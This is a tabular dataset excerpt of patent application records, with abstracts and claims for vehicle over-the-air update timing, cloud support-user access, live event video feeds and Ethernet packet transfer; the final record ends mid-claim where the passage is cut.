9,187 | 9,187 | 15,641,753 | 2,444 | A system includes a processor configured to maintain a perpetual connection to a vehicle communication device, barring environmental interference or vehicle communication device failure. The processor is further configured to receive data packets from the vehicle communication device indicating an ignition state change and determine a present vehicle ignition state based on the data packets. | 1. A system comprising:
a processor configured to: maintain a perpetual connection to a vehicle communication device, barring environmental interference or vehicle communication device failure; receive data packets from the vehicle communication device indicating an ignition state change; and determine a present vehicle ignition state based on the data packets. 2. The system of claim 1, wherein the processor is configured to attempt to re-establish the perpetual connection, responsive to resumed connection availability following environmental interference. 3. The system of claim 1, wherein the vehicle communication device includes a cellular modem. 4. The system of claim 1, wherein the processor is configured to report the present vehicle ignition state to an update process. 5. The system of claim 1, wherein the processor is configured to report a change in the present vehicle ignition state, upon determining the present vehicle ignition state has changed from a previously determined vehicle ignition state, to an update process. 6. A system comprising:
a processor configured to: determine that an update is available for a vehicle; query a vehicle watchdog process, designed to maintain perpetual vehicle connectivity, absent environmental interference or hardware failure, for a current vehicle ignition state; and deliver a data payload responsive to receiving an indication from the watchdog process that the vehicle ignition state matches a state designated for payload delivery. 7. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an ignition on state. 8. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an accessory on state. 9. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an ignition off state. 10. The system of claim 6, wherein the data payload includes a software update package. 11. The system of claim 6, wherein the processor is further configured to receive confirmation of a successful payload delivery and log the confirmation in a record indicating a vehicle software status. 12. A computer-implemented method comprising:
maintaining a perpetual connection to a vehicle communication device, absent environmental interference or vehicle communication device failure; receiving data packets from the vehicle communication device indicating an ignition state change; and determining a present vehicle ignition state based on the data packets. 13. The method of claim 12, further comprising attempting to re-establish the perpetual connection, responsive to resumed connection availability following environmental interference. 14. The method of claim 12, wherein the vehicle communication device includes a cellular modem. 15. The method of claim 12, further comprising:
determining that an update is available for a vehicle; and deliver a data payload responsive to determining the vehicle ignition state matches a state designated for payload delivery. 16. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an ignition on state. 17. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an accessory on state. 18. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an ignition off state. 19. The method of claim 15, wherein the data payload includes a software update package. 20. The method of claim 15, further comprising receiving confirmation of a successful payload delivery and logging the confirmation in a record indicating a vehicle software status. | A system includes a processor configured to maintain a perpetual connection to a vehicle communication device, barring environmental interference or vehicle communication device failure. The processor is further configured to receive data packets from the vehicle communication device indicating an ignition state change and determine a present vehicle ignition state based on the data packets.1. A system comprising:
a processor configured to: maintain a perpetual connection to a vehicle communication device, barring environmental interference or vehicle communication device failure; receive data packets from the vehicle communication device indicating an ignition state change; and determine a present vehicle ignition state based on the data packets. 2. The system of claim 1, wherein the processor is configured to attempt to re-establish the perpetual connection, responsive to resumed connection availability following environmental interference. 3. The system of claim 1, wherein the vehicle communication device includes a cellular modem. 4. The system of claim 1, wherein the processor is configured to report the present vehicle ignition state to an update process. 5. The system of claim 1, wherein the processor is configured to report a change in the present vehicle ignition state, upon determining the present vehicle ignition state has changed from a previously determined vehicle ignition state, to an update process. 6. A system comprising:
a processor configured to: determine that an update is available for a vehicle; query a vehicle watchdog process, designed to maintain perpetual vehicle connectivity, absent environmental interference or hardware failure, for a current vehicle ignition state; and deliver a data payload responsive to receiving an indication from the watchdog process that the vehicle ignition state matches a state designated for payload delivery. 7. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an ignition on state. 8. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an accessory on state. 9. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an ignition off state. 10. The system of claim 6, wherein the data payload includes a software update package. 11. The system of claim 6, wherein the processor is further configured to receive confirmation of a successful payload delivery and log the confirmation in a record indicating a vehicle software status. 12. A computer-implemented method comprising:
maintaining a perpetual connection to a vehicle communication device, absent environmental interference or vehicle communication device failure; receiving data packets from the vehicle communication device indicating an ignition state change; and determining a present vehicle ignition state based on the data packets. 13. The method of claim 12, further comprising attempting to re-establish the perpetual connection, responsive to resumed connection availability following environmental interference. 14. The method of claim 12, wherein the vehicle communication device includes a cellular modem. 15. The method of claim 12, further comprising:
determining that an update is available for a vehicle; and deliver a data payload responsive to determining the vehicle ignition state matches a state designated for payload delivery. 16. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an ignition on state. 17. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an accessory on state. 18. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an ignition off state. 19. The method of claim 15, wherein the data payload includes a software update package. 20. The method of claim 15, further comprising receiving confirmation of a successful payload delivery and logging the confirmation in a record indicating a vehicle software status. | 2,400 |
9,188 | 9,188 | 15,843,304 | 2,434 | Disclosed herein are system, method, and computer program product embodiments for generating support user permissions to allow access to a cloud computing platform. In an embodiment, a host system may host a cloud computing platform and may provide access to the cloud computing platform to a tenant system. The tenant system may then facilitate access to the cloud computing platform to users. The tenant system may maintain a list of authorized users separate from the host system. In an embodiment, if the tenant system requests support from the host system to fix a problem, the host system is able to generate access for support users to access the cloud computing platform to troubleshoot the problem. In an embodiment, even though the tenant system maintains a separate list of authorized users, the host system is able to generate support user permissions. | 1. A computer implemented method, comprising:
providing, by a host system, a cloud computing platform to a tenant system, wherein the tenant system utilizes an authorization process separate from an authorization process used by the host system; receiving, at the host system, a cloud computing platform access request from a user account; analyzing, by the host system, the cloud computing platform access request to determine that the cloud computing platform access request includes an assistance request from the tenant system; and facilitating, by the host system, access to the cloud computing platform to the user account in response to determining that the cloud computing platform access request includes an assistance request from the tenant system. 2. The computer implemented method of claim 1, wherein the assistance request includes a help ticket identification generated by the cloud computing platform. 3. The computer implemented method of claim 1, wherein the assistance request includes an identification of a tenant device configured to utilize the tenant system to access the cloud computing platform. 4. The computer implemented method of claim 1, wherein the cloud computing platform access request includes login credentials, the method further comprising:
searching a database managed by the host system for information matching the login credentials; and associating a cloud computing access permission with the user account. 5. The computer implemented method of claim 1, further comprising:
determining that the tenant system maintains a database of authorized users separate from the host system; and in response to receiving the cloud computing platform access request from the user account, generating a support user account in the host system, wherein the support user account includes a permission to access the cloud computing platform. 6. The computer implemented method of claim 1, further comprising:
granting, by the host system to the tenant system, a permission to monitor user account interactions with the cloud computing platform. 7. The computer implemented method of claim 1, further comprising:
granting, by the host system to the tenant system, a permission to modify cloud computing platform interactions available to the user account. 8. A system, comprising:
a memory; and at least one processor coupled to the memory and configured to:
provide, by a host system, a cloud computing platform to a tenant system, wherein the tenant system utilizes an authorization process separate from an authorization process used by the host system;
receive, at the host system, a cloud computing platform access request from a user account;
analyze, by the host system, the cloud computing platform access request to determine that the cloud computing platform access request includes an assistance request from the tenant system; and
facilitate, by the host system, access to the cloud computing platform to the user account in response to determining that the cloud computing platform access request includes an assistance request from the tenant system. 9. The system of claim 8, wherein the assistance request includes a help ticket identification generated by the cloud computing platform. 10. The system of claim 8, wherein the assistance request includes an identification of a tenant device configured to utilize the tenant system to access the cloud computing platform. 11. The system of claim 8, wherein the cloud computing platform access request includes login credentials and wherein the at least one processor is further configured to:
search a database managed by the host system for information matching the login credentials; and associate a cloud computing access permission with the user account. 12. The system of claim 8, wherein the at least one processor is further configured to:
determine that the tenant system maintains a database of authorized users separate from the host system; and in response to receiving the cloud computing platform access request from the user account, generate a support user account in the host system, wherein the support user account includes a permission to access the cloud computing platform. 13. The system of claim 8, wherein the at least one processor is further configured to:
grant, by the host system to the tenant system, a permission to monitor user account interactions with the cloud computing platform. 14. The system of claim 8, wherein the at least one processor is further configured to:
grant, by the host system to the tenant system, a permission to modify cloud computing platform interactions available to the user account. 15. A non-transitory computer-readable device having instructions stored thereon that, when executed by at least one computing device, causes the at least one computing device to perform operations comprising:
providing, by a host system, a cloud computing platform to a tenant system, wherein the tenant system utilizes an authorization process separate from an authorization process used by the host system; receiving, at the host system, a cloud computing platform access request from a user account; analyzing, by the host system, the cloud computing platform access request to determine that the cloud computing platform access request includes an assistance request from the tenant system; and facilitating, by the host system, access to the cloud computing platform to the user account in response to determining that the cloud computing platform access request includes an assistance request from the tenant system. 16. The non-transitory computer-readable device of claim 15, wherein the assistance request includes an identification of a tenant device configured to utilize the tenant system to access the cloud computing platform. 17. The non-transitory computer-readable device of claim 15, wherein the cloud computing platform access request includes login credentials, the operations further comprising:
searching a database managed by the host system for information matching the login credentials; and associating a cloud computing access permission with the user account. 18. The non-transitory computer-readable device of claim 15, the operations further comprising:
determining that the tenant system maintains a database of authorized users separate from the host system; and in response to receiving the cloud computing platform access request from the user account, generating a support user account in the host system, wherein the support user account includes a permission to access the cloud computing platform. 19. The non-transitory computer-readable device of claim 15, the operations further comprising:
granting, by the host system to the tenant system, a permission to monitor user account interactions with the cloud computing platform. 20. The non-transitory computer-readable device of claim 15, the operations further comprising:
granting, by the host system to the tenant system, a permission to modify cloud computing platform interactions available to the user account. | Disclosed herein are system, method, and computer program product embodiments for generating support user permissions to allow access to a cloud computing platform. In an embodiment, a host system may host a cloud computing platform and may provide access to the cloud computing platform to a tenant system. The tenant system may then facilitate access to the cloud computing platform to users. The tenant system may maintain a list of authorized users separate from the host system. In an embodiment, if the tenant system requests support from the host system to fix a problem, the host system is able to generate access for support users to access the cloud computing platform to troubleshoot the problem. In an embodiment, even though the tenant system maintains a separate list of authorized users, the host system is able to generate support user permissions.1. A computer implemented method, comprising:
providing, by a host system, a cloud computing platform to a tenant system, wherein the tenant system utilizes an authorization process separate from an authorization process used by the host system; receiving, at the host system, a cloud computing platform access request from a user account; analyzing, by the host system, the cloud computing platform access request to determine that the cloud computing platform access request includes an assistance request from the tenant system; and facilitating, by the host system, access to the cloud computing platform to the user account in response to determining that the cloud computing platform access request includes an assistance request from the tenant system. 2. The computer implemented method of claim 1, wherein the assistance request includes a help ticket identification generated by the cloud computing platform. 3. The computer implemented method of claim 1, wherein the assistance request includes an identification of a tenant device configured to utilize the tenant system to access the cloud computing platform. 4. The computer implemented method of claim 1, wherein the cloud computing platform access request includes login credentials, the method further comprising:
searching a database managed by the host system for information matching the login credentials; and associating a cloud computing access permission with the user account. 5. The computer implemented method of claim 1, further comprising:
determining that the tenant system maintains a database of authorized users separate from the host system; and in response to receiving the cloud computing platform access request from the user account, generating a support user account in the host system, wherein the support user account includes a permission to access the cloud computing platform. 6. The computer implemented method of claim 1, further comprising:
granting, by the host system to the tenant system, a permission to monitor user account interactions with the cloud computing platform. 7. The computer implemented method of claim 1, further comprising:
granting, by the host system to the tenant system, a permission to modify cloud computing platform interactions available to the user account. 8. A system, comprising:
a memory; and at least one processor coupled to the memory and configured to:
provide, by a host system, a cloud computing platform to a tenant system, wherein the tenant system utilizes an authorization process separate from an authorization process used by the host system;
receive, at the host system, a cloud computing platform access request from a user account;
analyze, by the host system, the cloud computing platform access request to determine that the cloud computing platform access request includes an assistance request from the tenant system; and
facilitate, by the host system, access to the cloud computing platform to the user account in response to determining that the cloud computing platform access request includes an assistance request from the tenant system. 9. The system of claim 8, wherein the assistance request includes a help ticket identification generated by the cloud computing platform. 10. The system of claim 8, wherein the assistance request includes an identification of a tenant device configured to utilize the tenant system to access the cloud computing platform. 11. The system of claim 8, wherein the cloud computing platform access request includes login credentials and wherein the at least one processor is further configured to:
search a database managed by the host system for information matching the login credentials; and associate a cloud computing access permission with the user account. 12. The system of claim 8, wherein the at least one processor is further configured to:
determine that the tenant system maintains a database of authorized users separate from the host system; and in response to receiving the cloud computing platform access request from the user account, generate a support user account in the host system, wherein the support user account includes a permission to access the cloud computing platform. 13. The system of claim 8, wherein the at least one processor is further configured to:
grant, by the host system to the tenant system, a permission to monitor user account interactions with the cloud computing platform. 14. The system of claim 8, wherein the at least one processor is further configured to:
grant, by the host system to the tenant system, a permission to modify cloud computing platform interactions available to the user account. 15. A non-transitory computer-readable device having instructions stored thereon that, when executed by at least one computing device, causes the at least one computing device to perform operations comprising:
providing, by a host system, a cloud computing platform to a tenant system, wherein the tenant system utilizes an authorization process separate from an authorization process used by the host system; receiving, at the host system, a cloud computing platform access request from a user account; analyzing, by the host system, the cloud computing platform access request to determine that the cloud computing platform access request includes an assistance request from the tenant system; and facilitating, by the host system, access to the cloud computing platform to the user account in response to determining that the cloud computing platform access request includes an assistance request from the tenant system. 16. The non-transitory computer-readable device of claim 15, wherein the assistance request includes an identification of a tenant device configured to utilize the tenant system to access the cloud computing platform. 17. The non-transitory computer-readable device of claim 15, wherein the cloud computing platform access request includes login credentials, the operations further comprising:
searching a database managed by the host system for information matching the login credentials; and associating a cloud computing access permission with the user account. 18. The non-transitory computer-readable device of claim 15, the operations further comprising:
determining that the tenant system maintains a database of authorized users separate from the host system; and in response to receiving the cloud computing platform access request from the user account, generating a support user account in the host system, wherein the support user account includes a permission to access the cloud computing platform. 19. The non-transitory computer-readable device of claim 15, the operations further comprising:
granting, by the host system to the tenant system, a permission to monitor user account interactions with the cloud computing platform. 20. The non-transitory computer-readable device of claim 15, the operations further comprising:
granting, by the host system to the tenant system, a permission to modify cloud computing platform interactions available to the user account. | 2,400 |
9,189 | 9,189 | 15,993,353 | 2,426 | A server, system, and method generate a live video feed. The method is performed at a server connected to a computer network. The method includes receiving an indication of a predetermined type of action during a live event. The method includes generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event. The method includes identifying a user device that is to receive the first video feed based on predetermined rules. The method includes determining whether the user device is prepared to receive the first video feed. When the user device is prepared, the method includes transmitting the first video feed to the user device for an automatically playback on the user device to display a video of the predetermined type of action currently occurring during the live event. | 1. A method, comprising:
at a server connected to a computer network: receiving an indication of a predetermined type of action during a live event; generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event; identifying a user device that is to receive the first video feed based on predetermined rules; determining whether the user device is prepared to receive the first video feed; and when the user device is prepared, transmitting the first video feed to the user device for an automatically playback on the user device to display a video of the predetermined type of action currently occurring during the live event. 2. The method of claim 1, wherein the first video feed has a predefined, finite duration. 3. The method of claim 2, wherein the predefined, finite duration is based on one of a server system clock, a game clock tracking the live event, or a length corresponding to the predetermined type of action. 4. The method of claim 2, wherein the predefined, finite duration is defined by an entity owning rights to the live event. 5. The method of claim 1, further comprising:
receiving a request to view the broadcast feed, indicating that the user device has requested to switch to the broadcast feed. 6. The method of claim 5, further comprising:
verifying that one of the user device or a user using the user device is entitled to view the broadcast feed. 7. The method of claim 1, wherein the user device is prepared when one of the user device is not currently playing a video, the user device has a particular application launched thereon, or a combination thereof. 8. The method of claim 7, further comprising:
transmitting a status request to the user device to identify one of whether the user device is currently playing a video, whether the user device has a particular application launched thereon, or a combination thereof; and receiving a response to the status request from the user device. 9. The method of claim 8, wherein, when the user device is unprepared to receive the first video feed, transmitting a message to be presented on the user device indicating that the predetermined type of action is occurring in the live event without displaying the first video feed. 10. The method of claim 1, further comprising:
receiving user information indicative of a preference to receive the first video feed based on the predetermined rules. 11. A server, comprising:
a transceiver configured to establish a connection to a computer network that a user device is connected, the transceiver receiving an indication of a predetermined type of action during a live event; and a processor generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event, the processor identifying a user device that is to receive the first video feed based on predetermined rules, the processor determining whether the user device is prepared to receive the first video feed, wherein, when the user device is prepared, the transceiver transmits the first video feed to the user device for an automatically playback on the user device to display a video of the predetermined type of action currently occurring during the live event. 12. The server of claim 11, wherein the first video feed has a predefined, finite duration. 13. The server of claim 12, wherein the predefined, finite duration is based on one of a server system clock, a game clock tracking the live event, or a length corresponding to the predetermined type of action. 14. The server of claim 12, wherein the predefined, finite duration is defined by an entity owning rights to the live event. 15. The server of claim 11, wherein the transceiver receives a request to view the broadcast feed, and wherein the processor generating an indication that the user device has requested to switch to the broadcast feed. 16. The server of claim 15, wherein the processor verifies that one of the user device or a user using the user device is entitled to view the broadcast feed. 17. The server of claim 11, wherein the user device is prepared when one of the user device is not currently playing a video, the user device has a particular application launched thereon, or a combination thereof. 18. The server of claim 17, wherein the transceiver transmits a status request to the user device to identify one of whether the user device is currently playing a video, whether the user device has a particular application launched thereon, or a combination thereof, and wherein the transceiver receives a response to the status request from the user device. 19. The server of claim 18, wherein, when the user device is unprepared to receive the first video feed, the transceiver transmits a message to be presented on the user device indicating that the predetermined type of action is occurring in the live event without displaying the first video feed. 20. A system, comprising:
an in-venue computing system configured to capture information associated with a live event and generate an indication that a predetermined type of action has occurred during the live event; and a server receiving the indication, the server generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event, the server identifying a user device that is to receive the first video feed based on predetermined rules, the server determining whether the user device is prepared to receive the first video feed, when the user device is prepared, the server transmitting the first video feed to the user device for an automatically playback on the user device to display a video of the predetermined type of action currently occurring during the live event. | A server, system, and method generate a live video feed. The method is performed at a server connected to a computer network. The method includes receiving an indication of a predetermined type of action during a live event. The method includes generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event. The method includes identifying a user device that is to receive the first video feed based on predetermined rules. The method includes determining whether the user device is prepared to receive the first video feed. When the user device is prepared, the method includes transmitting the first video feed to the user device for an automatically playback on the user device to display a video of the predetermined type of action currently occurring during the live event.1. A method, comprising:
at a server connected to a computer network: receiving an indication of a predetermined type of action during a live event; generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event; identifying a user device that is to receive the first video feed based on predetermined rules; determining whether the user device is prepared to receive the first video feed; and when the user device is prepared, transmitting the first video feed to the user device for an automatically playback on the user device to display a video of the predetermined type of action currently occurring during the live event. 2. The method of claim 1, wherein the first video feed has a predefined, finite duration. 3. The method of claim 2, wherein the predefined, finite duration is based on one of a server system clock, a game clock tracking the live event, or a length corresponding to the predetermined type of action. 4. The method of claim 2, wherein the predefined, finite duration is defined by an entity owning rights to the live event. 5. The method of claim 1, further comprising:
receiving a request to view the broadcast feed, indicating that the user device has requested to switch to the broadcast feed. 6. The method of claim 5, further comprising:
verifying that one of the user device or a user using the user device is entitled to view the broadcast feed. 7. The method of claim 1, wherein the user device is prepared when one of the user device is not currently playing a video, the user device has a particular application launched thereon, or a combination thereof. 8. The method of claim 7, further comprising:
transmitting a status request to the user device to identify one of whether the user device is currently playing a video, whether the user device has a particular application launched thereon, or a combination thereof; and receiving a response to the status request from the user device. 9. The method of claim 8, wherein, when the user device is unprepared to receive the first video feed, transmitting a message to be presented on the user device indicating that the predetermined type of action is occurring in the live event without displaying the first video feed. 10. The method of claim 1, further comprising:
receiving user information indicative of a preference to receive the first video feed based on the predetermined rules. 11. A server, comprising:
a transceiver configured to establish a connection to a computer network that a user device is connected, the transceiver receiving an indication of a predetermined type of action during a live event; and a processor generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event, the processor identifying a user device that is to receive the first video feed based on predetermined rules, the processor determining whether the user device is prepared to receive the first video feed, wherein, when the user device is prepared, the transceiver transmits the first video feed to the user device for an automatically playback on the user device to display a video of the predetermined type of action currently occurring during the live event. 12. The server of claim 11, wherein the first video feed has a predefined, finite duration. 13. The server of claim 12, wherein the predefined, finite duration is based on one of a server system clock, a game clock tracking the live event, or a length corresponding to the predetermined type of action. 14. The server of claim 12, wherein the predefined, finite duration is defined by an entity owning rights to the live event. 15. The server of claim 11, wherein the transceiver receives a request to view the broadcast feed, and wherein the processor generating an indication that the user device has requested to switch to the broadcast feed. 16. The server of claim 15, wherein the processor verifies that one of the user device or a user using the user device is entitled to view the broadcast feed. 17. The server of claim 11, wherein the user device is prepared when one of the user device is not currently playing a video, the user device has a particular application launched thereon, or a combination thereof. 18. The server of claim 17, wherein the transceiver transmits a status request to the user device to identify one of whether the user device is currently playing a video, whether the user device has a particular application launched thereon, or a combination thereof, and wherein the transceiver receives a response to the status request from the user device. 19. The server of claim 18, wherein, when the user device is unprepared to receive the first video feed, the transceiver transmits a message to be presented on the user device indicating that the predetermined type of action is occurring in the live event without displaying the first video feed. 20. A system, comprising:
an in-venue computing system configured to capture information associated with a live event and generate an indication that a predetermined type of action has occurred during the live event; and a server receiving the indication, the server generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event, the server identifying a user device that is to receive the first video feed based on predetermined rules, the server determining whether the user device is prepared to receive the first video feed, when the user device is prepared, the server transmitting the first video feed to the user device for an automatically playback on the user device to display a video of the predetermined type of action currently occurring during the live event. | 2,400 |
9,190 | 9,190 | 16,064,100 | 2,463 | A method involves transferring a transmittal data block from a transmitting device via an Ethernet connection to a receiving device which has a storage for storing a transferred transmittal data block, and a processor for at least partially processing the transferred transmittal data block stored in the storage. The transmitting device forms from the data of the transmittal data block a sequence of Ethernet packets, comprising respectively management data and a transmittal data sub-block. The receiving device receives the Ethernet packets of the respective sequence and, while employing at least a part of the management data, writes the transmittal data sub-blocks of the received Ethernet packets of the sequence of Ethernet packets for the transmittal data block to the storage, wherein not upon or after the writing each of the transmittal data sub-blocks an interrupt is sent to the processor. | 1.-18. (canceled) 19. A method for transferring a transmittal data block from a transmitting device, for example at least a part of a sensor or a part of an evaluation device, preferably for evaluating transmittal data, via an Ethernet connection to a receiving device, for example to an evaluating device for evaluating transmittal data, which has a storage for storing a transferred transmittal data block, and a processor for at least partially processing the transferred transmittal data block stored in the storage,
wherein the transmittal data in the transmittal data block are preferably sensor data of a sensor for the examination of value documents, in which the transmitting device forms from the data of the transmittal data block a sequence of Ethernet packets, which comprise respectively management data and a transmittal data sub-block, which is formed from at least a part of the data, so that the transmittal data sub-blocks of the Ethernet packets of the sequence comprise the data of the transmittal data block, wherein the management data comprise management data, from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the sequence, and sends the formed Ethernet packets via the Ethernet connection to the receiving device, and in which the receiving device receives the Ethernet packets of the respective sequence and while employing at least a part of the management data writes the transmittal data sub-blocks of the received Ethernet packets of the sequence of Ethernet packets for the transmittal data block to the storage, wherein not upon or after the writing each of the transmittal data sub-blocks an interrupt is sent to the processor. 20. The method according to claim 19, in which a receive signal, for example an interrupt, is emitted to the processor, preferably emitted only if a pre-specified amount of Ethernet packets of the sequence were received and the data of the transmittal data sub-blocks therein were written to the storage and/or upon receiving or storing at least one pre-specified error occurs and/or the transmittal data from the useful data block of the last Ethernet packet of the sequence were written to the storage. 21. The method according to claim 19, in which the receiving device has an FPGA, and in which by means of the FPGA, while employing the management data, the transmittal data sub-blocks from received Ethernet packets are written to the storage and in which preferably the FPGA triggers the emitting of a receive signal, for example an interrupt, to the processor after recognition and/or writing of the last transmittal data sub-block. 22. The method according to claim 19, in which the management data of each of the Ethernet packets of the sequence of Ethernet packets can comprise a sequence identifier for the transmittal data block which characterizes the transmittal data sub-block such that upon their employment, the transmittal data block can be formed from the transmittal data sub-blocks, and the sequence identifier is employed for writing the transmittal data sub-blocks to the storage. 23. The method according to claim 19, in which the management data of each of the Ethernet packets of the sequence of Ethernet packets comprise a sequence identifier for the transmittal data block which characterizes the transmittal data block. 24. The method according to claim 19, in which for at least one of the transmittal data sub-blocks at least two Ethernet packets are formed whose useful data block contains respectively the transmittal data sub-block, and are sent via the Ethernet connection to the receiving device, and upon reception of more than one Ethernet packet for the same transmittal data sub-block the data of the transmittal data sub-block are written only once to the storage or the data of the transmittal data sub-block are overwritten in the storage. 25. The method according to claim 19, in which at least one further transmitting device forms from the data of a further transmittal data block to be sent by it a further sequence of Ethernet packets which comprise respectively management data and a transmittal data sub-block which is formed from at least a part of the data, so that the transmittal data sub-blocks of the Ethernet packets of the further sequence comprise the data of the further transmittal data block,
wherein the management data comprise management data, from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the further sequence, and sends the formed Ethernet packets via the Ethernet connection to the receiving device, and in which the receiving device, after receiving the Ethernet packets, processes these in dependence on the transmitting device which has sent these, preferably separated according to transmitting device. 26. A transmitting device for sending at least one transmittal data block, for example in the form of a sensor or a part of an evaluation device, which
has a transmission buffer for the at least partially and temporarily storing data of the transmittal data block, and an Ethernet interface, and is designed to form a sequence of Ethernet packets from the transmittal data block which respectively comprise management data and a transmittal data sub-block formed from the respective transmittal data block, so that the transmittal data sub-blocks of the Ethernet packets of the sequence comprise the data of the transmittal data block, wherein the management data comprise management data from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the sequence, and to send the Ethernet packets via the Ethernet interface. 27. The transmitting device according to claim 26, which further has a processor and instructions of a computer program upon whose execution the processor of the transmittal data block forms the sequence of Ethernet packets in the transmission buffer. 28. The transmitting device according to claim 26, which has an FPGA connected to the Ethernet interface or at least forming a part of the Ethernet interface, which is programmed such that it forms from the transmittal data block Ethernet packet the management data and the transmittal data sub-blocks for the respective sequence of Ethernet packets. 29. The transmitting device according to claim 26, in which the Ethernet interface has an Ethernet controller, having an internal DMA functionality which is designed such that it can process descriptor lists independently. 30. A receiving device for receiving sequences of the Ethernet packets which are formable by a transmitting device and contain respectively transmittal data sub-blocks of a transmittal data block, having
a storage for storing a transferred transmittal data block, a processor for at least partially processing the transmittal data block stored in the storage, and a receiving portion which is designed for receiving sequences of Ethernet packets having data of the transmittal data block and writing respectively the transmittal data sub-blocks contained in the received Ethernet packets while employing at least a part of the management data in the storage, wherein the receiving portion is further designed such that the receiving portion does not send an interrupt to the processor upon or after the writing of each of the transmittal data sub-blocks. 31. The receiving device according to claim 30, in which the receiving portion is designed such that it emits a receive signal, for example an interrupt, to the processor, preferably emits only if a pre-specified amount of Ethernet packets of the same sequence were received and the transmittal data of the transmittal data sub-blocks therein were written to the storage and/or upon receiving or storing at least one pre-specified error occurs and/or the transmittal data from the useful data block of the last Ethernet packet of the sequence were written to the storage. 32. The receiving device according to claim 30, in which the receiving portion has an FPGA, wherein the receiving portion is designed such and the FPGA is configured or programmed such that by means of the FPGA, while employing the management data, the transmittal data sub-blocks from received Ethernet packets are written to the storage, and that the FPGA preferably after writing the transmittal data sub-blocks of a pre-specified amount of Ethernet packets of the sequence to the storage and/or writing of the last transmittal data sub-block of the sequence, triggers the emitting of a receive signal, for example an interrupt, to the processor. 33. The receiving device according to claim 32, in which the receiving portion has a PHY which is connected to the FPGA via a data connection, wherein the FPGA is further configured or programmed such that it works as an Ethernet controller. 34. The receiving device according to claim 32, in which the FPGA, the processor and the storage are connected via a PCIe network. 35. The receiving device according to claim 32, which comprises several PHY which are connected to the FPGA, and the FPGA is programmed such that transmittal data sub-blocks of Ethernet packets, which were received from a respective one of the PHY, respectively are written to the storage. 36. The receiving device according to claim 30, which also comprises a transmitting device, wherein the Ethernet interface of the transmitting device is given by a portion of the receiving portion which also works as an Ethernet interface of the transmitting device. | A method involves transferring a transmittal data block from a transmitting device via an Ethernet connection to a receiving device which has a storage for storing a transferred transmittal data block, and a processor for at least partially processing the transferred transmittal data block stored in the storage. The transmitting device forms from the data of the transmittal data block a sequence of Ethernet packets, comprising respectively management data and a transmittal data sub-block. The receiving device receives the Ethernet packets of the respective sequence and, while employing at least a part of the management data, writes the transmittal data sub-blocks of the received Ethernet packets of the sequence of Ethernet packets for the transmittal data block to the storage, wherein not upon or after the writing each of the transmittal data sub-blocks an interrupt is sent to the processor.1.-18. (canceled) 19. A method for transferring a transmittal data block from a transmitting device, for example at least a part of a sensor or a part of an evaluation device, preferably for evaluating transmittal data, via an Ethernet connection to a receiving device, for example to an evaluating device for evaluating transmittal data, which has a storage for storing a transferred transmittal data block, and a processor for at least partially processing the transferred transmittal data block stored in the storage,
wherein the transmittal data in the transmittal data block are preferably sensor data of a sensor for the examination of value documents, in which the transmitting device forms from the data of the transmittal data block a sequence of Ethernet packets, which comprise respectively management data and a transmittal data sub-block, which is formed from at least a part of the data, so that the transmittal data sub-blocks of the Ethernet packets of the sequence comprise the data of the transmittal data block, wherein the management data comprise management data, from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the sequence, and sends the formed Ethernet packets via the Ethernet connection to the receiving device, and in which the receiving device receives the Ethernet packets of the respective sequence and while employing at least a part of the management data writes the transmittal data sub-blocks of the received Ethernet packets of the sequence of Ethernet packets for the transmittal data block to the storage, wherein not upon or after the writing each of the transmittal data sub-blocks an interrupt is sent to the processor. 20. The method according to claim 19, in which a receive signal, for example an interrupt, is emitted to the processor, preferably emitted only if a pre-specified amount of Ethernet packets of the sequence were received and the data of the transmittal data sub-blocks therein were written to the storage and/or upon receiving or storing at least one pre-specified error occurs and/or the transmittal data from the useful data block of the last Ethernet packet of the sequence were written to the storage. 21. The method according to claim 19, in which the receiving device has an FPGA, and in which by means of the FPGA, while employing the management data, the transmittal data sub-blocks from received Ethernet packets are written to the storage and in which preferably the FPGA triggers the emitting of a receive signal, for example an interrupt, to the processor after recognition and/or writing of the last transmittal data sub-block. 22. The method according to claim 19, in which the management data of each of the Ethernet packets of the sequence of Ethernet packets can comprise a sequence identifier for the transmittal data block which characterizes the transmittal data sub-block such that upon their employment, the transmittal data block can be formed from the transmittal data sub-blocks, and the sequence identifier is employed for writing the transmittal data sub-blocks to the storage. 23. The method according to claim 19, in which the management data of each of the Ethernet packets of the sequence of Ethernet packets comprise a sequence identifier for the transmittal data block which characterizes the transmittal data block. 24. The method according to claim 19, in which for at least one of the transmittal data sub-blocks at least two Ethernet packets are formed whose useful data block contains respectively the transmittal data sub-block, and are sent via the Ethernet connection to the receiving device, and upon reception of more than one Ethernet packet for the same transmittal data sub-block the data of the transmittal data sub-block are written only once to the storage or the data of the transmittal data sub-block are overwritten in the storage. 25. The method according to claim 19, in which at least one further transmitting device forms from the data of a further transmittal data block to be sent by it a further sequence of Ethernet packets which comprise respectively management data and a transmittal data sub-block which is formed from at least a part of the data, so that the transmittal data sub-blocks of the Ethernet packets of the further sequence comprise the data of the further transmittal data block,
